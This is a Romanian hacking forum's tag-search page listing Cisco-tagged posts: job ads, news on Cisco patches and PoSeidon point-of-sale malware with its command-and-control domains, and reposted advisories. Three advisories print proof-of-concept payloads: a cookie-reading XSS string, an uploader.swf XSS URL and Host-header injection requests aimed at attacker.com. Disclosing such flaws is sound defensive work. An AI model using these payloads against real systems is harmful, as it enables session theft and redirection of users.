Jump to content

Search the Community

Showing results for tags 'cisco'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Cumparaturi online's Test
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 15 results

  1. Career Chance for IT-Technicians in Germany / Austria! Our client - an international IT corporate with global presence - is a clear trendsetter in modern IT technologIies with a very broad, diversified range of services in the field of Voice over IP Communication, Video Conferencing, Collaboration and Virtual Meeting Solutions serving the Top 500 companies and organisations on each market. Due to the further expansion they are looking for a dedicated, skilled person as On-Site Support Engineer (m/w) Unified Communication In this position you will set-up, optimize and operate Cisco UCC Solutions on-site with the customers and manage customer non-standard and specific requirements. Furthermore you will be in charge of support and trouble-shooting, infrastructural changes and implementations, rectify incidents if necessary, setup configurations and Cisco appliances and supervise the UCC infrastructure. Your profil: • Network/IT Bachelor Degree • Working-experience in IT / Communication-Technology • Experience with Cisco UCC solutions from technical point of view • Cisco CCNA / CCNP Know-How • Fluent in English, some command in German and the willingness to improve and to attend German language courses • Excellent organisational and problem-solving skills, self-motivated and innovative talents IT-Technicians should be open for relocation to Germany / Austria! For further information please contact us! Tel.: +43 1 / 908 1887-0 office@esone.eu
  2. Remote code execution for some, denial of service for the rest of us Cisco has issued a string of patches for 16 faults including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets. One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service. "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine." Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority response thanks to lax message validation "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says . Further vulnerabilities coupled in that advisory lead to denial of service conditions. The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software rated 5 can be easily exploited by attackers sending a packet that would thanks to IPv6 extension headers trigger denial of service. It says this occurs because the headers are not typical of normal operation and says there are no work-arounds for the flaw meaning affected systems will require the patch. "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. "An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic." That exploit can cause a reload of the line card triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected. Source
  3. Document Title: =============== Cisco (Newsroom) - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1464 Release Date: ============= 2015-04-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1464 Common Vulnerability Scoring System: ==================================== 2.5 Product & Service Introduction: =============================== Cisco Systems, Inc. is an American multinational corporation headquartered in San Jose, California, that designs, manufactures, and sells networking equipment. The stock was added to the Dow Jones Industrial Average on June 8, 2009, and is also included in the S&P 500 Index, the Russell 1000 Index, NASDAQ-100 Index and the Russell 1000 Growth Stock Index. (Copy of the Homepage: http://en.wikipedia.org/wiki/Cisco_Systems ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Cisco Newsroom online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-04-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cisco Product: Newsroom - Web Application (Online Service) 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non persistent cross site scripting web vulnerability has been discovered in the official Cisco Newsroom online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions data by client-side manipulated cross site requests. The vulnerability is located in the `articleId` value of the cisco newsroom service module. Remote attackers are able to inject own script codes to the vulnerable GET method request of thenewsroom module. The attack vector of the vulnerability is located on the client-side of the newsroom service web-application. The request method to inject the script code on client-side is `GET`. The injection point of the issue is the vulnerable `articleId` value in the newsroom and the script code execution point is located in the exception-handling module page. The exception-handling displays the input without secure encoding which results in the client-side script code execution. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Service(s): [+] Cisco Newsroom Vulnerable Module(s): [+] Newsroom Vulnerable Parameter(s): [+] articleId Affected Section(s): [+] Exception-handling (Cisco Newsroom Webserver) Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exception-Handling Vulnerability <div class="portlet-msg-error"> No Article exists with the articleId=" --><iframe src="x" onload="alert(document.cookie)">.</div> --- PoC Session Logs [GET] --- Host=newsroom.cisco.com User-Agent=Mozilla/5.0 (X11; Linux i686; rv:36.0) Gecko/20100101 Firefox/36.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Cookie=__cfduid=d0badc5a5542aab093f77ec7b2c7fcb4e1426397090; _mkto_trk=id:010-KNZ-501&token:_mch-cisco.com-1426397096496-85931; s_nr=1426612128335-Repeat; v1st=F94588C905A69AF; CP_GUTC=41.105.135.196.1426397309701574; _ga=GA1.2.915487673.1426397317; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; _ga=GA1.3.915487673.1426397317; __unam=1119172-14c1bebf7bd-10eb7fb3-50; __utma=174467517.915487673.1426397317.1426397593.1426451546.2; __utmz=174467517.1426451546.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); _actmu=161136040.703418129.1426397801884.1426397801884; FBT_LTBox_PR=yes; utag_main=v_id:014c1f3316c3001cd060059682a902042002f0090086e$_sn:3$_ss:1$_st:1426465861885$_pn:1%3Bexp-session$ses_id:1426464061885%3Bexp-session; JSESSIONID=6589D463BF249D67B9B8F40AD5973DDE; undefined=0; mygallerypersist=0; __utmc=174467517; s_cc=true; s_ria=flash%2011%7C; cdc_ut=prevacct:cisco-us%2Ccisco-newsatcisco$accesslevel:guest$ts:1426612115239$customEvents:; s_suite=cisco-us,cisco-newsatcisco; s_country=US; s_language=en; s_sq=%5B%5BB%5D%5D; s_ppv=35; ObSSOCookie=mdeeW%2BwzPp%2FHuAjfbay5gq9VCphOfELvYcvAbmb10rcmkqL%2BoN5WuZW3zD%2BWp3iH%2B0Bdm3eP7th2faHmHu5fk2aOV1lgAc8IjLwgkabZNO6g9soQJYR%2Bp1j%2Bakulkb4q%2BMiybdSb2wiTgPaH26TXgvtqARFPLLeVxeQ3VmDd121e00naIL8JzpatIZ%2BATa0svqvtsEKd2W5n9MNimkrvvb7LeslMcpTbAtC3p%2FfQ0ulKkvun4e0VNGCOedx51KoHFbvVyLMkkKkCvWp1N032L0KoF21ITcCYKwH7TGwQeBGg5PYKbBJsJlt%2FpfKF4dEZwtEI6PuGzMtF1b5grDwdw%2FjHlku%2FIHPR1oLGp3HWwEU9aHrMDzb4BGFoBaI3rAzU; wasOnLoginPage=false; loginPageReferrer=; PAPPS-Loc=papps-prod1.cisco.com; _gat_UA-23583380-1=1; _gat_newsroom=1; _gat_marketing=1; s_dfa=cisco-us%2Ccisco-newsatcisco; s_pv=newsroom.cisco.com%2Fexecbio-detail Connection=keep-alive Reference(s): http://newsroom.cisco.com Solution - Fix & Patch: ======================= The vulnerability has been fixed/patched by the cisco developer team since 24th april 2015. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the newsroom service is estimated as medium. (CVSS 2.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  4. Subject: Cisco UCSM username and password hashes sent via SYSLOG Impact: Information Disclosure / Privilege Elevation Vendor: Cisco Product: Cisco Unified Computing System Manager (UCSM) Notified: 2014.10.31 Fixed: 2015.03.06 ( 2.2(3e) ) Author: Tom Sellers ( tom at fadedcode.net ) Date: 2015.03.21 Description: ============ Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 sends local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data. SYSLOG Example ( portions of password hash replaced with <!snip!> ): Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd Vulnerable environment(s): ========================== Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B- Series blades servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute solutions and allow for policy based and rapid deployment of resources. They are are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity. Software Versions: 1.3 - 2.2(1b)A Hardware: Cisco 6120 XP, 6296 UP SYSLOG Configuration: - Level: Information - Facility: Local7 - Faults: Enabled - Audits: Enabled - Events: Disabled Risks: ====== 1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure. 2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM. 3. SYSLOG is transmitted in plain text. Submitter recommendations to vendor: ==================================== 1. Remove the username and password hash data from the SYSLOG output. 2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system. 3. Add support for TLS wrapped SYSLOG output. Vendor response/resolution: ========================== After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than it was in progress with an undetermined release date. On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text: --- Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours. --- For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed. Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match. The following documents remain available: Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705 Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705 Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634 Associated vendor IDs: PSIRT-1394165707 CSCur54705 Timeline: ============ 2014.10.30 Reported to psirt@cisco.com 2014.11.04 Response from PSIRT, assigned PSIRT-1394165707 2014.11.06 Follow up questions from Cisco, response provided same day 2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705. 2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status. 2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time 2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission 2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc. 2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission 2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e) Reference: 1 - http://tools.cisco.com/security/center/publicationListing.x 2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 ) Source
  5. Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week. The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.Cisco IP phones According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone. “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory. Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users. The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems. Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor. Sursa
  6. Cisco on Friday shared details on what the company says is new breed of Point-of-Sale (PoS) malware that is more sophisticated and much better designed than previously seen PoS threats. Dubbed “PoSeidon” by Cisco, the malware has some resemblance to ZeuS and uses better methods to find card data than BlackPoS, the malware family reportedly used in the 2013 attack against Target and against Home Depot in 2014. According to Cisco, the malware scrapes memory to search out number sequences that specifically match up with formats used by Visa, MasterCard, AMEX and Discover, and goes as far as using the Luhn algorithm to verify that credit or debit card numbers are valid. “PoSeidon was professionally written to be quick and evasive with new capabilities not seen in other PoS malware,” members of Cisco’s Security Solutions team wrote in a blog post. “PoSeidon can communicate directly with C&C servers, self-update to execute new code and has self-protection mechanisms guarding against reverse engineering.” Some components of PoSeidon are illustrated in the following diagram created by Cisco: PoSeidon PoS Malware Features “At a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the target machine in order to survive a possible system reboot,” Cisco’s team explained. “The Loader then contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server.” The Keylogger component was potentially used to steal passwords and could have been the initial infection vector, Cisco said. Upon being run, the Loader checks to see if it’s being executed with one of these two file names: WinHost.exe or WinHost32.exe. If it is not, the malware will make sure that no Windows service is running with the name WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe, overwriting any file in that location that would happen to have the same name. Next, Loader will start a service named WinHost. According to Cisco, this method allows the threat to remain running in memory even if the current user logs off. If the Loader is not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them. Once installed, the Loader attempts to communicate with one of the hardcoded C&C server and Associated IP Addresses: Domains Name Associated IP Addresses linturefa.com xablopefgr.com tabidzuwek.com lacdileftre.ru tabidzuwek.com xablopefgr.com lacdileftre.ru weksrubaz.ru linturefa.ru mifastubiv.ru xablopefgr.ru tabidzuwek.ru 151.236.11.167 185.13.32.132 185.13.32.48 REDACTED at request of Federal Law Enforcement 31.184.192.196 91.220.131.116 91.220.131.87 Once captured, PoSeidon exfiltrates the payment card numbers and keylogger data to servers, after being XORed and base64 encoded. Most of the command and control servers are currently hosted on .ru domains, Cisco said. Some of the known domains used for data exfiltration servers include: • quartlet.com • horticartf.com • kilaxuntf.ru • dreplicag.ru • fimzusoln.ru • wetguqan.ru Other domains and IPs that could indicate a compromise include: • linturefa.com • xablopefgr.com • tabidzuwek.com • linturefa.ru • xablopefgr.ru • tabidzuwek.ru • weksrubaz.ru • mifastubiv.ru • lacdileftre.ru • quartlet.com • horticartf.com • kilaxuntf.ru • dreplicag.ru • fimzusoln.ru • wetguqan.ru IP Addresses: • 151.236.11.167 • 185.13.32.132 • 185.13.32.48 • 31.184.192.196 • 91.220.131.116 • 91.220.131.87 “PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the sophisticated techniques and approaches of malware authors,” Cisco’s Security Solutions team noted. “Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats.” In its annual Global Threat Intel Report, security firm CrowdStrike noted that criminals have been increasingly turning to ready-to-use PoS malware kits in the cyber-underground. According to Adam Meyers, vice president of intelligence at CrowdStrike, the price of these kits varied depending on their complexity, with some going for tens of dollars and others costing in the hundreds or thousands. In its report, CrowdStrike explained that the explosion of PoS malware may be mitigated by the adoption of EMV standards (Europay, MasterCard and Visa) as well as the growth of payment options such as Google Wallet and Apple Pay. Other point of sale malware used in recent attacks include vSkimmer, Dexter, Backoff, LusyPOS and Dump Memory Grabber, among others. In December 2014, researchers at Trend Micro came across a sample of a new PoS malware called “Poslogr” which appeared to be under development. Source
  7. The Cisco Network Simulator, Router Simulator & Switch Simulator The Boson NetSim Network Simulator is an application that simulates Cisco Systems' networking hardware and software and is designed to aid the user in learning the Cisco IOS command structure. NetSim utilizes Boson's proprietary Network Simulator, Router Simulator® and EROUTER® software technologies, along with the Boson Virtual Packet Technology® engine, to create individual packets. These packets are routed and switched through the simulated network, allowing NetSim to build an appropriate virtual routing table and simulate true networking. Other simulation products on the market do not support this level of functionality. Source ? NetSim Cisco Network Simulator & Router Simulator Download ? GirlShare - Download Boson NetSim 8.0.rar
  8. Salut, Caut un rockstar sysadmin cu skills foarte bune de unix/networking care o sa faca si ops. Stackul nostru include - Masini cu coreos, centos, rareori ubuntu - Echipamente de tip cisco - Zeci de servere - nu folosim vm's de obicei containere (docker/rocket) - De mentionat ca lucram cu FOARTE multe IP-uri. Thanks. De mentionat ca jobul este in Bucuresti.
  9. Cisco Connect 2015 Mai vine careva?
  10. Cisco Ironport AsyncOS Cross Site Scripting Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-022 Cisco Ironport SMA - AsyncOS 8.4.0-126 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2013-6780 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter. XSS Payload: http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}// References: https://tools.cisco.com/bugsearch/bug/CSCur44409 https://tools.cisco.com/bugsearch/bug/CSCur89626 https://tools.cisco.com/bugsearch/bug/CSCur89624 http://yuilibrary.com/support/20131111-vulnerability/ http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source
  11. Cisco Ironport AsyncOS HTTP Header Injection Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-021 Cisco Ironport SMA - AsyncOS 8.4.0-138 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2015-0624 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 20-02-2015: Vendor Advisory Release 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website. PoC #1 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: ironport:8443:@[attacker.com] PoC #2 GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Content-Length: 0 Host: [attacker.com] PoC #3 GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 DNT: 1 Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd Connection: keep-alive Host: ironport:8443 X-Forwarded-Host: [attacker.com] References: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source
  12. Am cautat pe forum si nu l-am gasit postat asa ca am zis sa-l postez ( bine inteles pentru cei interesati ) Adversaries are committed to continually rening or developing new techniques that can evade detection and hide malicious activity. Meanwhile, the defenders—namely, security teams—must constantly improve their approach to protecting the organization and users from these increasingly sophisticated campaigns. Caught in the middle are the users. But now, it appears they not only are the targets, but also the complicit enablers of attacks. The Cisco 2015 Annual Security Report, which presents the research, insights, and perspectives provided by Cisco® Security Research and other security experts within Cisco, explores the ongoing race between attackers and defenders, and how users are becoming ever-weaker links in the security chain. Cybersecurity is a broad and complex topic that has a far-reaching impact on users, companies, governments, and other entities around the world. The Cisco 2015 Annual Security Report is divided into four areas of discussion. These sections, and the issues explored within them, may at rst glance seem disparate, but closer examination reveals their interconnectedness: Read more: 